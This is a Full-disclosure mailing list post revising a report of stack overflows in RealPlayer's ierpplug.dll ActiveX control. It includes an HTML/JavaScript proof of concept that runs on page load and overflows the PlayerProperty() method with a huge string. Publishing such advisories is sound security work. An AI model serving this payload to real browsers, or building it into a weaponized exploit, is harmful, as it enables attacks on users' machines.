[Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

[Elazar Broad]

After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130, although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:

-------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

    while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
   
      var obj2 = obj.PlayerProperty(s);


   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">

 </body>
</html> 
-------------

Elazar